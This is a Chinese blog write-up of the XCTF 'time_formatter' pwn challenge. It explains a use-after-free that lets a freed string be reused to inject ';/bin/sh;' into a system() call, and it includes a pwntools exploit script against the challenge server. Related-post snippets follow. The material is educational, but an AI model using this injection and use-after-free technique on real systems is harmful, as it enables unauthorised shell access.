[攻防世界 pwn]——time_formatter(内涵peak小知识)

最新推荐文章于 2022-12-19 21:34:47 发布
原创 最新推荐文章于 2022-12-19 21:34:47 发布 · 412 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

[攻防世界 pwn]——time_formatter

peak小知识

  1. 堆空间释放后,指针不指向NULL,就仍指向该空间,并且重新申请的堆空间就是最先释放的堆空间
  2. Linux中 echo “;ls;cat flag;/bin/sh;”
    ls ,cat flag , /bin/sh, 会挨个执行

老规矩还是先checksec一下
在这里插入图片描述
在IDA中查看一下反汇编的源代码
在这里插入图片描述
在这里插入图片描述
sub_400D26()函数是为了让你们输入选项。

我们仔细看看各个代码,

选项1,申请空间
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

选项5,释放ptr 和value的空间,但是都没有指向NULL。指针仍然指向原空间。
在这里插入图片描述
选项4里面有我们, 心中年年不忘的system函数。首先它判断ptr是否为空,我们只要让ptr等于"/bin/sh"就可以获得shell了
在这里插入图片描述
在选项3中,也是申请一个新的堆空间,ptr释放后没有指向NULL, 新申请的空间也就是ptr指向的空间
在这里插入图片描述
在这里插入图片描述

思路

  • 选择选项1,申请空间
  • 选择选项5,释放空间,但是不退出程序
  • 选择选项3,将释放的空间重新申请,并写入 “/bin/sh”
  • 选择选项4,获得shell

exploit

from pwn import * 
p = remote("111.200.241.244",57231)

p.sendlineafter("> ","1")
p.sendlineafter("Format: ","A")
p.sendlineafter("> ","5")
p.sendlineafter("Are you sure you want to exit (y/N)? ",'N')
p.sendlineafter("> ","3")
p.sendlineafter("Time zone: ","';/bin/sh;'")
p.sendlineafter("> ","4")
p.interactive()
攻防世界 Pwn time_formatter
MrTreebook的博客
03-06 552
攻防世界 Pwn time_formatter1.checksec分析2.IDA分析menu在 print_your_time 找到有关system函数控制好参数ptr即可拿到权限输入限制UAF利用思路3.exp 1.checksec分析 2.IDA分析 menu puts("Welcome to Mary's Unix Time Formatter!"); do { while ( 2 ) { puts("1) Set a time format.");
攻防世界 time_formatter
10-25 671
1 题目 2 分析 首先,找到漏洞点: 通过构造command,我们可以执行系统命令。所以对于ptr,我们希望他是这样的:';/bin/sh;' 这样我们就能通过system方法执行/bin/sh。于是,接下来的工作就是如何让ptr等于我们需要的值。 需要注意。ptr,也就是time format,他的输入时有字符检查的: 可以看到,我们的“;”不在允许范围内,所以通过输入直接构建ptr是不可能的。 这道题目的突破点其实就在退出函数这里: 可以看到,退出函...
攻防世界pwn高手进阶区-time_formatter
优快云_sunrise的博客
10-31 1010
文章目录time_formatter伪代码main函数功能1--set_time_format功能2--set_time功能3--set_time_zone功能4--print_time功能5--free_and_exitpayload说明exp time_formatter 伪代码 main函数 循环输出菜单并根据输入跳转执行不同功能。 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __gid_t v3; // eax FI
2019XCTF攻防世界之萌新入坑(time_formatter
weixin_44113469的博客
04-11 2029
time_formatter
攻防世界pwn——dice_game
qq_62076255的博客
12-19 632
攻防世界pwn——dice_game做题记录
(wp)攻防世界PWN——guess_num
0pt1mus
04-02 1357
转载自个人博客0pt1mus 好久没有做PWN题了,今天开始做一下,把之前的东西捡起来,同时对之前有些知识点也有了新的认识,新的理解。 分析 首先将附件下载下来,同时通过nc连接一下,了解一下大致的流程。 可以看到,先让我们输入用户名,然后输入猜的的数字。 然后常规操作,通过file和checksec工具判断文件类型和开启了那些防护措施。 可以知道这是一个64位的linux程序,并且开启了部分...
XCTF PWN高手进阶区之time_formatter
neuisf的博客
01-29 403
这是第一道堆溢出题目, 程序执行选项1时,通过strdup函数申请了一块内存保存用户输入的时间格式字符串,执行选项三时,同样 通过strdup申请了一块内存用于存放用户输入的时区字符串,执行选项五时,首先释放这两块内存,然后,询问是否真的退出,此时,用户选择不退出时,程序继续回到开始执行。而此时,前两块申请的内存已被释放,未将指针置为NULL。造成UAF漏洞。 由于选项一读取用户输入内容时,会过滤...
time_formatter [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列20
重新启程
12-25 959
题目地址:time_formatter 速度挺快的,已经赶上高手进阶区的第九题了! 废话不说,看看题目先 可以看到星星已经到了三颗星了。表示有点不一样的地方了。 照例看下安全机制 [*] '/ctf/work/python/time_formatter/807522d1647f4f0b8b26d6c1530d72b7' Arch: amd64-64-little ...
BinaryFormatter反序列化漏洞
UKK
06-20 2840
BinaryFormatter反序列化漏洞 http://www.ifind.cc/view/230
.Net反序列化漏洞之BinaryFormatter
weixin_33978016的博客
11-28 629
https://googleprojectzero.blogspot.com.es/2017/04/exploiting-net-managed-dcom.html .Net反序列化导致RCE的样例,有两点限制: BinaryFormatter::Deserialize反序列化的内容用户可控 .Net SDK大于等于4.5 using System; using System.Collecti...
plaidctf-2016 unix_time_formatter uaf漏洞分析
小强的博客
11-15 1069
源代码下载及其他writeup参考: https://github.com/ctfs/write-ups-2016/tree/master/plaidctf-2016/pwnable/unix_time_formatter-76 直接去print_time函数(自定义)查看: 在system中执行command命令,command字符串通过snprin
LosFormatter反序列化漏洞
UKK
06-18 316
LosFormatter反序列化漏洞 http://www.ifind.cc/view/224
time 格式化 linux,[20201112]time TIMEFORMAT格式.txt
weixin_34058060的博客
05-13 456
[20201112]time TIMEFORMAT格式.txt--//time命令缺省显示如下:# time echo 2^1000000 | bc > /dev/nullreal 0m4.614suser 0m4.598ssys 0m0.006s--//实际上可以显示格式使用TIMEFORMAT环境变量:# TIMEFORMAT="%3lU user + %3lS s...
[攻防世界 pwn]——guess_num
Y_peak的博客
02-19 1563
[攻防世界 pwn]——guess_num15 [攻防世界 pwn]——level0 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX, canary, PIE 好家伙 在IDA中发现 我们只要利用gets函数将seed[0]给覆盖掉就可以了, 间距为0x20 用C语言写个小demo #include <stdio.h> #include <stdlib.h> int main() { int n, b;
[攻防世界 pwn]——monkey
Y_peak的博客
02-27 1061
[攻防世界 pwn]——monkey 题目地址:https://adworld.xctf.org.cn/ 题目: 额,怎么说呢这道题。checksec没什么大不了的 但是再IDA中就懵了,好大呀。好多文件。进入mian函数,也没有看很明白。准备运行程序看看到底是干什么的,帮助分析一下 输入尝试输入aaaa,发现返回的东西没有被定义。我们在Linux命令中有时命令输入错误也是这样。猜测它可能直接让输入命令。结果输入help可以,但是有的命令可以有的不可以 在IDA中查看一下字符串,因为它可以输入的字
[攻防世界 pwn]——string(内涵peak知识
Y_peak的博客
02-19 921
[攻防世界 pwn]——string 题目地址:https://adworld.xctf.org.cn/ 题目: peak知识 mmap函数作用,mmap主要是将文件映射到一段内存去同时设置那段内存的属性可读可写或者是可执行详情请看mmap & mprotect 在checksec看到开启了canary和NX,应该和格式化字符串有关。 在IDA中看看,发现侧边栏竟然有mmap函数,这个地方应该是关键点, 找到函数位置,想要保证该函数执行,必须保证前两个函数执行完毕,并且a1 == a1[
[攻防世界 pwn]——warmup
Y_peak的博客
02-20 906
[攻防世界 pwn]——warmup 题目地址: https://adworld.xctf.org.cn/ 题目: 嘶, 碰过的第一个盲打的题, nc连上之后只有一个地址, 这个地址肯定是个有用的地址, 应该就是可以执行 system("/bin/sh")或者 system(“cat flag”)的地址。 提供了一个输入, 应该是可以进行栈溢出, 不然就太难了。尝试一下, 不过不知道要填充的长度也不知道是64位还是32位的。 我们只有挨个尝试, 写个exp如下: exploit from pwn i
[攻防世界 pwn]——pwn-200
Y_peak的博客
02-20 901
[攻防世界 pwn]——pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一般可以栈溢出。但是没有system和"/bin/sh"。首先, 利用已知的函数leek出来一个地址返回地址是可循环调用的地方,一般是用puts,或者write函数leek地址, 偶尔有时是printf函数, 然后找出libc版本计算偏移, 找到system和’/bin/sh’ 地址。重新构造rop链进而获
攻防世界pwn题目int_overflow
最新发布
03-08
### 关于CTF PWN Int Overflow Challenge Solution 在处理PWN类型的整数溢出挑战时,理解程序如何处理输入以及这些输入怎样影响内存至关重要。当遇到名为`int_overflow`的题目时,这可能意味着某个`int`型变量存在栈溢出风险[^2]。 对于这类问题的一个常见解决方法涉及以下几个方面: #### 分析目标程序 使用反汇编工具IDA可以深入分析二进制文件的工作原理。通过将题目中的可执行文件加载至IDA中并检查其主要逻辑流程,能够识别潜在的安全缺陷位置。特别是要注意那些未启用安全防护机制(如stack canary)的情况,在Ubuntu环境下测试可以帮助确认这一点。 #### 构造有效载荷(Payload) 基于发现的漏洞特性来构建特定的有效载荷是非常重要的一步。例如,在某些情况下,可以通过向缓冲区填充足够的数据直到覆盖返回地址,并指向一个已知地址处的gadget链或直接调用系统函数实现控制流劫持的目的。Python库`pwntools`提供了便捷的方法用于创建这样的payloads,并且支持本地调试和远程连接服务器提交攻击尝试[^3]。 ```python from pwn import * # 设置目标IP和端口 target_ip = "example.com" port_num = 12345 # 创建远程连接对象 io = remote(target_ip, port_num) # 定义payload结构 offset_to_ret_addr = ... # 需要根据实际情况调整偏移量大小 rop_chain_or_function_ptr = ... payload = b'A' * offset_to_ret_addr + pack(rop_chain_or_function_ptr) # 发送payload给服务端 io.sendlineafter(b"prompt:", payload) ``` 请注意上述代码片段仅为模板示意;实际操作前需依据具体情况进行适当修改以适应不同场景下的需求。 #### 测试与验证 完成以上准备工作之后,应当在一个受控环境中反复试验所设计出来的exploit直至成功获取shell或其他预期效果为止。同时也要注意遵守比赛规则和服务条款,确保行为合法合规[^4]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值